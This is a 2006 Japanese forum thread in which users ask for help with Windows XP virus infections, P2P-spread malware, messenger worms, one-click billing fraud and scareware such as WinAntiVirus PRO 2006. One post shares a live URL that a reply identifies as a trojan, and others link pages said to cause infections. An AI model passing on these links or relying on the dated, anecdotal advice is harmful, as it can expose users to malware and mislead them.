                      何でもいいんで教えて下さい。因みに"ドクロウイルス"ではないと思います。
158 ◆N9P3SuvBPo :2006/11/24(金) 23:04:16
>157
>セーフモード→意味ない
「セーフモードで起動してもドクロが出てきます。」と言う事だね。
>セーフモードに入らずシステムの復元→意味なかった
ダメ元で↓試せ
「セーフモード と コマンドプロンプト」

Administratorまたは管理者権限のアカウントでログイン

explorer.exeの変わりにcmd.exeを読みこむ(コマンドプロンプト起動・デスクトップ真っ暗)

以下の文字を打ちこんで「Enter」

%systemroot%\system32\restore\rstrui.exe(←システムの復元起動コマンド)
159名無しさん@お腹いっぱい。:2006/11/24(金) 23:05:55
>>157
P2Pやってたろ
160名無しさん@お腹いっぱい。:2006/11/24(金) 23:27:50
>>158
レス有難う。「セーフモード と コマンドプロンプト」 →死んだorz ドクロちゃんは健在。
初期化する前に、最後の手段として、別HDDにOSインスコしてそこからドクロHDDの中身を覗いてみるよ。

>>159
妹のパソコンだからよく分からん。でもやったことはあるが、最近はやってなかったらしい。
呼ばれて行ってみたら、既にドクロフリーズ状態。
161名無しさん@お腹いっぱい。:2006/11/25(土) 01:52:48
ちょっと教えてください。
リカバリー用にバックアップをしたいのですが
ウイルスソフト(ノートンインターネットセキュリティー)を
バックアップする最適の方法をご教示ください。
(ウイルスソフトの空白状態を最小にしたいので)
162名無しさん@お腹いっぱい。:2006/11/25(土) 02:20:06
>>161
シマンテックから最新の定義ファイルを事前に
落しておけばいいのではないでしょうか
163MONA ◆ApRjtwCQJQ :2006/11/25(土) 02:40:52

     ∧_∧   
    ( ´∀`)  >>161
    (    )  どっちにしろ、こういうの必要 ↓
    | | |   
    (__)_)  http://www.proton.co.jp/products/acronis-trueimage-9/
164キンタマ:2006/11/25(土) 02:42:10
【使用OS】XP
【WINDOWS UPDATE】してない
【ウィルスソフト】カスペ、バスター2005
【UPDATE】なし
【スキャン】たまに
【症状】すべての動作が重くされ、ほぼ、なにも出来ない状態orz
【やったこと】前にnyを使っていた
【とった処置】セーフモードでカスペでスキャン
アンチニイ、トロイ、キンタマが検出されましたが、状態変わらず(つД`)

初期化するしかないでしょうか?
165名無しさん@お腹いっぱい。:2006/11/25(土) 02:50:15
>>164
これは・・・無理!
OSのクリーンインストールだね
そして次回からはnyはやらない
やるにしてもWINDOWS UPDATEしてなきゃ、感染させて下さい状態だし
166名無しさん@お腹いっぱい。:2006/11/25(土) 03:16:36
>163
これがあればウイルスなんか怖くなくなりますね。
結局、怖い=面倒、なんですよねw
167164:2006/11/25(土) 03:26:38
>>165さん速答ありがとうございます!
やはり、そうですかorz… 重くて色んなデータのバックアップが取れない状態で
しぶってます(つд⊂)
168名無しさん@お腹いっぱい。:2006/11/25(土) 08:39:00
>>161
脳豚教授はウィルスソフトではなく、セキュリティソフトです。
169名無しさん@お腹いっぱい。:2006/11/25(土) 11:28:41
>>163
たぶん こに書き込むくらいただか
"ウイルス感染したのでバックアップ" じゃないでしょうか?
これじゃウイルス入りのイメージ作っちゃいます。

このてのソフトでは g4l がおすすめ。
勿論 健康な状態でのバックアップの話しです。
170名無しさん@お腹いっぱい。:2006/11/25(土) 19:40:49
初めまして。私の友人がウィルスによりPCを壊されたと聞いたので
詳細なんかはわかりませんが、もしよろしければ答えてくださるとありがたいです。

友人の話では、家から帰宅後PCをつけ、メールチェックを行った後
一旦PCから離れようとした瞬間突然PCが再起動し
ウィンドウズが立ち上がる所にドクロのマークがついて動かなくなったという話を聞きました。
私も友人のPCを触った事はないのでまったくわからないのですが
リカバリーをしても直らないそうで・・・もし知っている方がいらっしゃいましたら
何かきかせてはいただけないでしょうか?どうかお願いします。
171 ◆N9P3SuvBPo :2006/11/25(土) 19:55:27
>170
「メールチェックの時に何をやったか」を聞いとけ
172名無しさん@お腹いっぱい。:2006/11/25(土) 19:57:02
>>171
メール着てないか確認しただけで、特に何もやっていないそうです。
173名無しさん@お腹いっぱい。:2006/11/25(土) 19:58:51
カボスで出回り始めた新種のようだな
Alt+F4連打で起動はできるようだがソフトは何も使えないらしい

かなり強烈なウイルスだな
感染元のファイル名おしえてくれ






174名無しさん@お腹いっぱい。:2006/11/25(土) 20:18:58
突然再起動し動かなくなったそうなので、感染元ファイルもウィルス名も
何もわからないんです・・・。とてもムチャな質問ですいません。
やはり買い換えたほうがよろしいのでしょうか?
175 ◆N9P3SuvBPo :2006/11/25(土) 20:27:45
>173
>Alt+F4連打で起動
参考にしときたい
なんていう起動方法?(前回正常起動とかデバッグモードとか)
176173:2006/11/25(土) 20:38:33
>>175
いや そういう書き込みを見つけただけ
http://pcq.furu.org/thread.php?thread=87621
177名無しさん@お腹いっぱい。:2006/11/25(土) 20:51:55
>>174
>>157と同じかな?
友人はリカバリーの意味を勘違いしていると思われ。
リカバリーとはフォーマット(全てのファイルやフォルダをOS上から認識できなくなる)してから新規にファイルを書き込むこと。
BIOS感染型以外ならこれでOK
手に負えないなら新規購入よりはるかに安価なので購入店でリカバリ依頼なりメーカーに修理に出す。
178名無しさん@お腹いっぱい。:2006/11/25(土) 21:06:31
>>177
>>157の症状と同じみたいですね。ログを読まずに書き込んですいません。
友人には修理に出すように言ってみます。どうもありがとうございました!
179 ◆N9P3SuvBPo :2006/11/25(土) 21:12:20
>176
そっか…俺も何かあったときに、その方法試してみよう。
ありがと。

戻って>170
起動したとき、どこまで起動できる?
180名無しさん@お腹いっぱい。:2006/11/25(土) 21:16:08
>>178
ダウソをちらっとのぞいてみたがどうも潜伏期間があってその後発動するらしい
友人にカボスやめれと言っときな
181名無しさん@お腹いっぱい。:2006/11/25(土) 21:27:05
>>180
ダウソのどのスレか教えてくれまいか。
182180:2006/11/25(土) 21:35:36
>>181
http://tmp6.2ch.net/test/read.cgi/download/1164113539/110

過去ログにはもっとくわしい情報がありそうだ
183名無しさん@お腹いっぱい。:2006/11/25(土) 21:38:19
>>182
わざわざありがとう、早速読んでくる。
シェアはやってないけどこんなの貰ったら大変だもんな・・・・勉強しとく。
感謝、感謝!
184名無しさん@お腹いっぱい。:2006/11/26(日) 01:38:45
名前もわからないおかしなウィルスに感染してこまっています。友達から変なURLがメッセンジャーで送られてきて、
インストールしてしまったら、感染したという感じです。
症状はメッセンジャーもひらいていないのに勝手にサインインをしてそのときオンラインのメンバー全員に、
そのURLを貼り付けて送るというものです。なぜかそのURLは私の発言になってしまうのです。
それを私にくれた友達も同じ状態で私に送ってきたそうです。
デスクトップにwinstallと名前の書かれた変なソフトがあって、それが勝手に働いておかしくなるんですけど、
何回ためしてもそれを削除することができないのです。
やったことは、それを削除しようとしただけです。しかし、このままにするとすごい人数に被害かかかるので今すごく
困っています。対処法を知っている方がいたら教えてください!!
185名無しさん@お腹いっぱい。:2006/11/26(日) 01:49:01
>>184
【使用OS】
【WINDOWS UPDATE】
【ウィルスソフト】
【UPDATE】
【スキャン】
【症状】
【やったこと】
【とった処置】

>友達から変なURLがメッセンジャーで送られてきて、インストールしてしまったら、感染したという感じです。
変な物は知人から送られてきても実行しないのが基本です。

少し古めのウイルスのような気がしますが、セキュリティソフトは最新の定義にしていますか?
186MONA ◆ApRjtwCQJQ :2006/11/26(日) 01:54:55

     ∧_∧   
    ( ´∀`)  >>184
    (    )  
    | | |   http://www.pandasoftware.jp/activescan/index.html
    (__)_)
           http://www.bitdefender.com/scan8/ie.html
187名無しさん@お腹いっぱい。:2006/11/26(日) 02:11:45
>>184
ついでにこれも、どぞー
カスペルスキー:オンライン ウイルス&スパイウェアスキャナ 
ttp://www.kaspersky.co.jp/scanforvirus/
188名無しさん@お腹いっぱい。:2006/11/26(日) 06:32:36
ドクロちゃんだがファイル名を指定して実行からコマンドプロントを起動するのはできるようだ
そっからレジストリエデイタを起動してスタートアップの自動起動エントリまわりのあやしいやつを削除ってのはどう?
しかしスタートアップに登録されてないって書き込みもあるし かなりやっかいなブツだな
p2pやってない人の感染報告もあるようだが シェアウエアなのにいつまでも金はらわねえと同じような症状になることもあるらしい
まあ p2pやらワレズウイルスは完全自己責任ですね

189名無しさん@お腹いっぱい。:2006/11/26(日) 14:12:04
ドクロウイルスってこの亜種?
ttp://internet.watch.impress.co.jp/cda/news/2006/07/24/12763.html
190名無しさん@お腹いっぱい。:2006/11/26(日) 14:22:16
【使用OS】XP home edition sp1
【WINDOWS UPDATE】いくつかのソフトウェア更新以外は 済
【ウィルスソフト】avast!
【UPDATE】最新
【スキャン】フルスキャン済
【症状】
IMEの単語登録が1年ほど前の状態に突然巻き戻りました。
最初はIMEの不具合でそういうこともあるのかと思ったのですが
今さっきサクラエディタの設定も巻き戻ってウイルスの挙動なのかと思い書き込みました。
【やったこと】
とりあえずそういうウイルスがあるのかと思って検索したのですがうまくしぼりこめず・・
【とった処置】

設定ファイルを巻き戻す(初期化する?)こんなウイルスはあるんでしょうか?
191名無しさん@お腹いっぱい。:2006/11/26(日) 14:28:24
>>189

のー

そんなウイルスもどきじゃなくてでかいところがからんでるような希ガス

経済産業省のニュースリリースに例として同じ症状がかいてあった
感染報告が極めて少ないウイルスであるにもかかわらず だ


192名無しさん@お腹いっぱい。:2006/11/26(日) 17:17:56
自分のブログのアクセス解析ページを見てみると、
article/unicom:download/start
なんてものがでます。
自分で作成したものでもないし、このページをクリックすると
「削除または移動された可能性があります」と表示されます。

これって何なんですか?
193名無しさん@お腹いっぱい。:2006/11/26(日) 17:56:14
すいません・・・・
変なワンクリックに引っかかったのですが
どうすればいいのでしょうか・・・・
194名無しさん@お腹いっぱい。:2006/11/26(日) 18:11:19
>>193
心配性なくせしてエロサイトでも覗いたか?
骨の髄までしゃぶられるか、無視するかの二つに一つだろ?
195名無しさん@お腹いっぱい。:2006/11/26(日) 18:13:04
トロイの木馬って何ですか〜〜?
196名無しさん@お腹いっぱい。:2006/11/26(日) 18:16:14
197名無しさん@お腹いっぱい。:2006/11/26(日) 18:18:17
198名無しさん@お腹いっぱい。:2006/11/26(日) 18:18:20
>>194
レスありがとうございます。
恥ずかしながら、お察しのとおりでございます・・・
ボケェ〜っとしてて、長いPOP UPの内容を読んでいませんでした。
単なる年齢認証だと思い、ok押したら、いきなりホスト情報が抜かれて
「登録完了」の画面になり、IPとか全部情報が出ていて、2日後までに
お金振り込めと・・・・・
無視してても大丈夫ですよね?
こんなバカをお助けください・・・・
199名無しさん@お腹いっぱい。:2006/11/26(日) 18:22:46
>>198
IPからお前の情報が漏れるわけないだろ?
無視しとけよ
200名無しさん@お腹いっぱい。:2006/11/26(日) 18:24:42
>>199
あなたの一言に少し涙が出てきました。
本当にありがとうございます;;
201名無しさん@お腹いっぱい。:2006/11/26(日) 18:26:20
>>198
無視無視。IPなんて晒してるんだから、表示されてもおかしくない。
住所や名前なんて分からんのだから。

捨てメアドから、クーリングオフでもしたらどうだ?(笑
202名無しさん@お腹いっぱい。:2006/11/26(日) 18:31:32
>>201
最初、それ考えたのですが、先ほど警視庁のHPでそれをやったら
いけないと書いてありました。

とにかく接触しないことですね。。

TVとか観てて「こういうのひっかかる奴いるんだな・・・」とか
冷ややかに観ていたら、まさか・・・あせりました。

お騒がせいたしました。板違いかも?にも親切に教えていただいて
本当に感謝しています^^
203名無しさん@お腹いっぱい。:2006/11/26(日) 18:31:36
>>200
さっきは、チンポの先っぽから涙が出てたのにwww

心配すんなよ  なんもありゃせんよ
204名無しさん@お腹いっぱい。:2006/11/26(日) 18:41:26
spybotやadawareをIEで検索してそのサイトにいくとIEが強制終了するのですが、これはウィルスでしょうか?
頻繁にsvhda.exeが強制終了みたいなメッセージが出てるのですが。
205名無しさん@お腹いっぱい。:2006/11/26(日) 18:42:46
友達がIPからその人のパソコンに入るとかよく分からないこと言っていたのですがそんなこと簡単に出来るのでしょうか?
自分もとりあえずそんなことされたらたまらないのでウィルスチェックとかWinny?関連のこと初心者なり調べてみたのですがよく分からりません
何か詳しいことを教えて下さい よろしくお願いします
206名無しさん@お腹いっぱい。:2006/11/26(日) 18:59:22
>>205
>よく分かりません

俺にだってポートが開いてなかったら何も出来ませんが?どうかした?
207名無しさん@お腹いっぱい。:2006/11/26(日) 19:00:07
>>186
の上ふんだらsmaily sourceてのに
感染した( ゚д゚)、ペッ
208名無しさん@お腹いっぱい。:2006/11/26(日) 19:02:47
>>207
単なるオンラインスキャンだろ・・
209名無しさん@お腹いっぱい。:2006/11/26(日) 19:02:58
>>204
svhda.exe は、トロイのようだな(スパイウェアとも書いてあるが)。

タイプが分からんので、
ttp://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM%5FSDBOT%2EXE&VSect=Sn
ttp://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM%5FSPYBOT%2EJZ&VSect=Sn

これでも見てくれ。
210名無しさん@お腹いっぱい。:2006/11/26(日) 19:04:30
>>206さん
それはつまりポート?を開いてればいろいろできて開いてなければ見ることもできないってことでしょうか?
・・・申し訳ありませんがそもそもポートとはなんですか?
211名無しさん@お腹いっぱい。:2006/11/26(日) 20:01:38
今、まったく見覚えのない、添付つき・タイトルが英文のメールが来ました。
プレビューは切っており、開けないで削除しましたが、
万が一ウィルスメールでも感染は大丈夫でしょうか?
(カスペのオンライン・スキャンでマイコンピュータをスキャンしても白でした)
一応NISのチェックを通過してるので、ウィルスメールでなく、
単なる誤配だったのでしょうか?
それともどこかで情報が漏れて・・・ガクガクブルブル
212211:2006/11/26(日) 20:04:26
今時、添付つきメールなんて、怪しすぎですよね?
もうどうしたら・・
213名無しさん@お腹いっぱい。:2006/11/26(日) 20:17:20
メールを開いていなければ大丈夫です
214名無しさん@お腹いっぱい。:2006/11/26(日) 20:17:55
添付ファイルつきの英文メールなんてまず間違いなくウイルスだろうからそのまま削除して正解
開かなければ感染はしない
microsoft製のメーラー使ってんならupdateしとかないと開いただけで感染っつーのもあり得る
特にoutlookはやばい officeの脆弱性攻撃が流行ってるし




215名無しさん@お腹いっぱい。:2006/11/26(日) 20:22:02
>>211
まずは>>1のテンプレ埋めれ

メールを受信して削除しただけなら感染することはない
ウイルスの可能性もあるしスパムの可能性もある
216名無しさん@お腹いっぱい。:2006/11/26(日) 20:25:04
不正なアクセスがって表示されるんですがマジでどうしたらいいか教えて下さい!本当に困ってます よろしくお願いします!
217名無しさん@お腹いっぱい。:2006/11/26(日) 20:32:52
>>190
まずはSP2にしなよ。
アバストは検知漏れがあるという前提で使用した方が良いので
カスペルスキー:オンライン ウイルス&スパイウェアスキャナ 
ttp://www.kaspersky.co.jp/scanforvirus/
怪しいときはオンラインスキャンしてね。
218名無しさん@お腹いっぱい。:2006/11/26(日) 20:35:09
>>216
おまいも>>1のテンプレ行き
「不正なアクセスが〜」って表示してるのはなんてソフトだ?
それからメッセージは省略せずにきちんと書いてくれ
219名無しさん@お腹いっぱい。:2006/11/26(日) 20:43:36
すいません はじめてでめっちゃてんばってて

不正なアクセスがってのに対して
みっつ対策があって
アクセスを遮断しカスタマイズをするってのを押したらとりあえずとまったのですが
220名無しさん@お腹いっぱい。:2006/11/26(日) 20:49:43
不正なクセうせスを削除するには言い留守のスキャンですかねええええ
ばか9
221名無しさん@お腹いっぱい。:2006/11/26(日) 20:52:31
>>220
すいません もし侵入された場合どこを確認すればよいでしょうか?
222名無しさん@お腹いっぱい。:2006/11/26(日) 20:59:58
またすいません

microsoft help hosting serverがアクセスしようとしてます

って出てくるのですがどう対処したらよいでしょうか
223名無しさん@お腹いっぱい。:2006/11/26(日) 21:14:16
>>222
だからなんてソフトがそのメッセージを出してるのか書けというに
それも含めて>>1のテンプレ全部埋めてこい
224名無しさん@お腹いっぱい。:2006/11/26(日) 21:16:03
あのさ>>1のテンプレの指示通り書き込んでくれ。
でないと誰も、対処法を教えられない。

225名無しさん@お腹いっぱい。:2006/11/26(日) 21:17:10
テンプレ

【使用OS】
【WINDOWS UPDATE】
【ウィルスソフト】
【UPDATE】
【スキャン】
【症状】
【やったこと】
【とった処置】
226211:2006/11/26(日) 21:19:36
>>213-215
すいません、はじめて添付ファイルつき英文メールを受け取ったので気が動転していました。
どうもありがとうございました。
NIS・・・ウイルスもスパムも拒否ってるはずなのに役立たず・・・。
227名無しさん@お腹いっぱい。:2006/11/26(日) 21:22:46
本当にすいません パソコン全然詳しくなくて

テンプレ

【使用OS】xp
【WINDOWS UPDATE】してないかもしれない
【ウィルスソフト】
【UPDATE】
【スキャン】
【症状】またすいません

microsoft help hosting serverがアクセスしようとしてます

【やったこと それのアクセスを遮断 を選択

これで大丈夫でしょうか?詳しくわかったらまたかきます
228名無しさん@お腹いっぱい。:2006/11/26(日) 21:35:03
nortonからのインターネットアクセス制御からの警告で
アクセス許可するか遮断するかカスタマイズするか
って出てきます
遮断のみ押すとなんかいも出てきて アプリケーション処理を常に使うを押すとしばらく消えます
229名無しさん@お腹いっぱい。:2006/11/26(日) 21:44:03
>>227
【ノートン】インターネットセキュリティ Ver.100【2007】
ttp://pc8.2ch.net/test/read.cgi/sec/1164252696/
ノートン関係はこちらでどぞー
230名無しさん@お腹いっぱい。:2006/11/26(日) 21:51:24
お尋ねしても宜しいでしょうか。

【使用OS】 Windows XP SP2
【WindowsUpdateしてるか】 自動更新ですが、念のため週に1〜2回手動で確認しています。
【AntiVirusは何を使っているか】 WinAntiVirus PRO 2006
【ちゃんとUpdateしてるか】 はい、ちゃんと最新の状態に更新しています。
【スキャンした結果(ウイルス名・発見場所)】 発見できない。
【別のオンラインスキャンしたならその結果は】 シマンテックやバスターのオンラインスキャンでは、WinAntiVirus PRO 2006を検出
【症状を具体的に、分かる限りすべて書く】 WinAntiVirus PRO 2006を入れてから動作が悪くなった。
【何をしたらそんなことになったのか】 貴方のパソコンは「ブラックウォーム」に感染される恐れがある。
セキュリティセンターは貴方のパソコンに「セキュリティミッス」を検出しました。現在使っているアンチウィルスでは
情報の流出を防ぐ事ができないと言われた。
【これまでにとった措置】 怖くなってノートン2006を削除してWinAntiVirus PRO 2006をインストール
【その他の質問】 WinAntiVirus PRO 2006が世界最強のセキュリティソフトと聞いたので、クレカで購入しました。
231名無しさん@お腹いっぱい。:2006/11/26(日) 21:54:08

3スレ前ぐらいでみたな
232名無しさん@お腹いっぱい。:2006/11/26(日) 22:04:28
本当にこんなん引っかかるやついるんだな
何人目だよ
233名無しさん@お腹いっぱい。:2006/11/26(日) 22:10:10
いや ふつうに釣りだとおもうが
234名無しさん@お腹いっぱい。:2006/11/26(日) 22:25:32
すいません マジでどうしたらよいでしょうか
本当にお願いします
235名無しさん@お腹いっぱい。:2006/11/26(日) 22:29:40
>>230
これは良い宣伝になりますね。これ以上被害者を増やさないための。
236名無しさん@お腹いっぱい。:2006/11/26(日) 22:30:44
>>230
>「ブラックウォーム」

下手な翻訳ミスで「ブラックワーム」が正解
その程度の糞ソフトをよく使う気になったな
237名無しさん@お腹いっぱい。:2006/11/26(日) 22:35:37
>>236もけっこう危ないぞww 気をつけろ。
238名無しさん@お腹いっぱい。:2006/11/26(日) 22:44:12
>>230
こりゃまたダイレクトな手法な釣りですなぁ〜

>WinAntiVirus PRO 2006が世界最強のセキュリティソフトと聞いたので、クレカで購入しました。

この最後の一文がまたアレですな(藁)
239名無しさん@お腹いっぱい。:2006/11/26(日) 23:03:20
しつこいな、いい加減秋田
何度目だよ
240名無しさん@お腹いっぱい。:2006/11/26(日) 23:04:39
件名が「DELIVERY FAIL USE : User mpaulina([email protected])not listed in public Name & Address Book 」、
送信者が「[email protected]」のメール受け取った人はいませんか?
コレ安全?
241名無しさん@お腹いっぱい。:2006/11/26(日) 23:08:08
>>240
覚えのないメールは問答無用で削除しましょう
242240:2006/11/26(日) 23:09:19
>>241
ありがとう、そうします。
243名無しさん@お腹いっぱい。:2006/11/26(日) 23:46:53
http://game9.2ch.net/test/read.cgi/gamef/1164525732/
このスレの1の画像を開いたらJaneDoeStyleが落ちました。
そしてタスクマネージャーを見るとemRtcl.exeというのが異常にCPUを使っています。
これはウィルスでしょうか?Googleでファイル名を検索しても3件しかヒットしません・・
244名無しさん@お腹いっぱい。:2006/11/27(月) 00:00:54
>>243
なんでもねえよ
245名無しさん@お腹いっぱい。:2006/11/27(月) 02:04:18
>>243
5人でなんだか踊ってる映像。安全。
246名無しさん@お腹いっぱい。:2006/11/27(月) 02:51:35
今日PC変えて以来、(ウイルスソフトはマカフィー→ウイルスバスター2006に変更)
MS02-039_SQL_SERVER_RESOLUTION_EXPLOIT
とかいうウイルスを3回もオンラインで検出したんですが、、、
一体何なんですかコレ?
説明読んでも的を射た回答が無かったので。
247名無しさん@お腹いっぱい。:2006/11/27(月) 04:14:32
>>246
セキュリティホールへの攻撃を防いだことを意味していますので特に対応の必要はありません。
心配する必要なし
248名無しさん@お腹いっぱい。:2006/11/27(月) 04:46:15
一回目・件名が「DELIVERY FAIL USE : User mpaulina([email protected])not listed in public Name & Address Book 」、
送信者が「[email protected]

二回目・件名「Delivery Status Natification(Failure)、
送信者「[email protected]」の添付つきメールが着た・・・。

気持ち悪いです、自分のメールが漏れてるのでしょうか??
249名無しさん@お腹いっぱい。:2006/11/27(月) 04:50:19
一応プロバはカスペ、
自分はNISでメールチェックしているはず(NISでともにクリーン)なのですが・・・。
250名無しさん@お腹いっぱい。:2006/11/27(月) 06:58:15
251名無しさん@お腹いっぱい。:2006/11/27(月) 07:49:26
>>248
件名や内容はちと違うが、最近俺の所にも何件か来た。
簡単に言うと、今までおまいがメールを出した先の誰かがウイルスに感染しただけ。
そのウイルスがメールの履歴を見て、逆に送りつけてる訳だな。

添付ファイルは絶対に開けるな。即削除しろ。
252名無しさん@お腹いっぱい。:2006/11/27(月) 07:50:31
>>248
ISP のメアドは匿名性がないよ。大抵、ISP のメアドは @ 以降のドメイン名が分かってる。
@ より前の文字列は英数記号で、まあ、総当たりでランダム文字列を作るだけで良かったりする。

Delivery Status Natification(Failure) のメールは、新手のスパムメール。
メールクライアントや Web メールによっては、Delivery Status Natification メールは自分で送ったものとして扱い、添付ファイルを表示してしまうものがある。
まあ、ほとんどは添付メールを表示しないので、見に覚えのないメールはさくっと消してしまのが良い。
253名無しさん@お腹いっぱい。:2006/11/27(月) 10:23:42
http://stelbox82.k-free.net/9999khz.html

これはどのようなウイルスでしょうか?
い........
254名無しさん@お腹いっぱい。:2006/11/27(月) 10:40:33
>>253
ttp://www.viruslistjp.com/search?VN=Trojan.JS.NoClose&referer=kis
ウィルスじゃなくてトロイだね

以下サイトから抜粋

一般的なトロイの木馬
この緩いカテゴリーには、犠牲となったPCにデータの一貫性を脅してダメージを与え
犠牲PCの動作を妨げる多様なトロイの木馬含まれます。
マルチ目的のトロイの木馬は、何人かのウイルス著者が
トロイの木馬パックよりも多機能的なトロイの木馬を作り出すので、このグループに含まれます。
255248:2006/11/27(月) 11:15:43
>>250-252
どうもありがとうござます。
一回目と二回目の時間差が4時間ほどなので、同一人物ですかね。
記述忘れですが、一回目も添付つきメールでした。
こちらもスパムだといいのですが・・・。
NIS、安全なメールをスパム扱いしてるくせに、肝心のヤツを弾かないとはw
256名無しさん@お腹いっぱい。:2006/11/27(月) 11:16:22
257名無しさん@お腹いっぱい。:2006/11/27(月) 12:24:45
うちのPCから「TSPY LINEAGE.BQA」の文字が…
FILEが開かない…
修理ですかね
258名無しさん@お腹いっぱい。:2006/11/27(月) 12:45:29
>>1の記入項目も埋められないようならメーカー修理でいいよ
259名無しさん@お腹いっぱい。:2006/11/27(月) 18:02:05
私のパソコンも今日初めてドライブクリーナーを4.900円で購入しなさいと出ました。
『職業及び夫婦関係を危うくするインストール済みファイルの正体が
おそらくわからないでしょう。こういうファイルは、ネット動作記録
を残して、あなたのクレジットカード情報を危険にさらすこともできます。』
と出て不安です。
アダルトサイトを観たせいで、とか書かれていますが、アイドルのコンサートやCMの動画を
観ていただけで、そんな覚えもありません。
しばらく様子をみてインストールしたソフトを削除しようと思っていますが。
ノートンのアンチウィルスの完全スキャンかけてみます。
何か情報をお持ちの方、教えていただければ嬉しいのですが、、
宜しくお願いします。
260名無しさん@お腹いっぱい。:2006/11/27(月) 18:10:41
>>259
DriveCleanerは詐欺ソフトですので、インストールしないでください。
日本語のUIを持つ詐欺的セキュリティソフト「DriveCleaner」
ttp://internet.watch.impress.co.jp/cda/news/2006/10/12/13602.html
DriveCleaner(Symantec Security Response)
ttp://www.symantec.com/region/jp/avcenter/venc/data/jp-drivecleaner.html

インストールした場合やインストールしてないのに広告が出続ける場合はこちらで
WinAntiVirus-詐欺ソフト対策総合スレ-SystemDoctor
http://pc8.2ch.net/test/read.cgi/sec/1162464139/
261名無しさん@お腹いっぱい。:2006/11/28(火) 01:51:17
>>186
の上ふんだら
>>207
と同じのに感染しました

当方カスぺいれてるんですが・・・

調べたらXcleanデラックス版でのみ除去できるようですが

ほかに除去しようないですか?

すいません教えてください
262名無しさん@お腹いっぱい。:2006/11/28(火) 02:11:59
>>261
なんにもならんけどなぁ、そのリンク踏んでも。
その感染したログをここに貼り付けるか、感染しているところをアップしてみて。

さくら画像アップローダー
ttp://sakuratan.ddo.jp/imgboard/imgboard.cgi


263名無しさん@お腹いっぱい。:2006/11/28(火) 02:44:33
>>262

Detected Smiley Source:
Registry Keys (2) :
HKEY_CLASSES_ROOT\typelib\{eddbdea4-5c07-453f-be8c-81d738984381}
HKEY_LOCAL_MACHINE\Software\Classes\TypeLib\{eddbdea4-5c07-453f-be8c-81d738984381}

CLSIDs (1) :
{eddbdea4-5c07-453f-be8c-81d738984381}

初心者なんでうupのしかたよく
わからないです

上はXceranearでの検出結果です
264名無しさん@お腹いっぱい。:2006/11/28(火) 04:02:25
             ○
         ⊂⊃ ⊂⊃ /~~\   ⊂⊃
    林林............,,,,傘傘傘::::::::傘傘傘.........林.林...

      zzzzzzzz...........
               _,,..,,,,_
       、,  ,,, 、,,  ./ ,' 3/⌒ヽ-、_   、 ,,  @
         、,   /l.  /____/      ヽ|ノ,,
    @   ,,, 、,,  ̄,, ̄ ̄ ̄ ̄,, ̄   ,,, 、,, 
    ヽ|ノ 、、,  ,, 、,,   , "  ,,  、、, ,,
265名無しさん@お腹いっぱい。:2006/11/28(火) 04:10:01
>>261
>>186
>の上ふんだら
>>>207
>と同じのに感染しました

て書いてあるけど、もしかして、パンダのオンラインスキャンしたらsmaily sourceが検出されたってこと?
266名無しさん@お腹いっぱい。:2006/11/28(火) 04:14:26
>>265
違いますURL踏んだ クリックした時点

で感染しました
267名無しさん@お腹いっぱい。:2006/11/28(火) 04:22:58
>>266
>感染しました

これはどうやって判明したの?
268267:2006/11/28(火) 04:32:29
>>267の質問は撤回させていただく。
これより急遽仕事に出かけねばならなくなったので。
ではこれにてシツレイさせていただく。
269名無しさん@お腹いっぱい。:2006/11/28(火) 04:34:09
>>267
常駐カスパでそのurl踏んだら

駆除することができませんでしたなんたらでて

いろんなオンラインスキャンためして
xcleanerで感染判明しました
270名無しさん@お腹いっぱい。:2006/11/28(火) 04:44:33
現在俺のパソコンがひと月ほど前からおかしくなっている。
昼間、パソコンを立ち上げると一分も経たずして勧誘の電話があちこちからかかってくるように
なった。墓地だったり証券だったり業種は様々だが明らかに俺の電話番号とパソコンの動作が
リンクするようになっている。偶然の域をとっくに超えているので、どうやって俺が家にいること
知ったんだ、と勧誘業者に噛み付いたこともある。もちろん答えなど言うはずはないが。
また、ネットに繋ぐのにもとんでもない時間がかかる。フリーズばかりする。

らしいです・・
271名無しさん@お腹いっぱい。:2006/11/28(火) 05:09:14
>>269
パンダのオンラインスキャンサイトです
272名無しさん@お腹いっぱい。:2006/11/28(火) 05:19:40
すいません、こんな早朝に
至急、教えて戴きたいことがあります

エロサイトを見ていて、
マイクロソフト〜からウィルス警告が出てしまいました
システムエラーが発見され至急、修理しなければ〜というような内容なのですが
ウィルスソフトを購入しなさいというページに繋がります

これは購入して修理した方が宜しいのでしょうか?
クレジットカード記入欄があり、躊躇しています
どなたかお教えお願いします
273名無しさん@お腹いっぱい。:2006/11/28(火) 05:28:46
それ、詐欺だから思い止まって。
どっちにしろ、カード使わないでノートンとかバスターはお店で買ったほうが良いよ。
来年には更新の手紙来るから、それをコンビニで払えば安くなるし。
274名無しさん@お腹いっぱい。:2006/11/28(火) 05:54:13
ありがとうございます

かなり、しつこく出てくるので

マイクロソフトの警告とばかり思ってしまいました

詐欺なんですね

警察に相談してみます
275名無しさん@お腹いっぱい。:2006/11/28(火) 06:14:06
>>274
別に相談しなくても...
しかとすればいいじゃん
276名無しさん@お腹いっぱい。:2006/11/28(火) 06:17:16
カード情報書いてしまった後なんです・・

こういう場合、どうしたらいいでしょうか?
277名無しさん@お腹いっぱい。:2006/11/28(火) 08:46:02
カードを使えないようにカード会社に連絡する
もう二度とオンラインでカードなんか使わない
怪しい物には手を出さない

#最近は小学校でも教わるレベルの話だろ それ
278名無しさん@お腹いっぱい。:2006/11/28(火) 13:12:48
>>274
相談して来い
きっとそんな調査に無駄遣い出来ないと上のやつらに直ぐに握り潰されるから
日本は遅れているんだよ
昔は、困ったら警察に相談しなさいと言われたものだが、
実態が解明されるにつれ当てにならない代名詞になりつつある
人が殺されなきゃ今では動きもしないとんでもない治安機関だ
279名無しさん@お腹いっぱい。:2006/11/28(火) 15:40:45
>>260 
259です。アドバイスありがとうございました。
教えて頂き助かりました。
ノートンで削除し、『プログラムと削除』でもアンインストールしたら
画面に出なくなりました。
不安にかられ購入せずに済みました。感謝申し上げます。
280名無しさん@お腹いっぱい。:2006/11/28(火) 15:43:37
>>279
そうだろう
目に見えなくなったら、もう感染していないと思っているんだよね
そんなあなたのパソコンはもうウィルスまみれだ
281名無しさん@お腹いっぱい。:2006/11/28(火) 15:50:06
>>279
悪い事は言わねぇ
初心者のうちはウィルスはスパイウェアに感染したと思ったら即効でリカバリしとけ
自分を含めて被害を最小限に食い止める意味でもな
282名無しさん@お腹いっぱい。:2006/11/28(火) 18:16:03
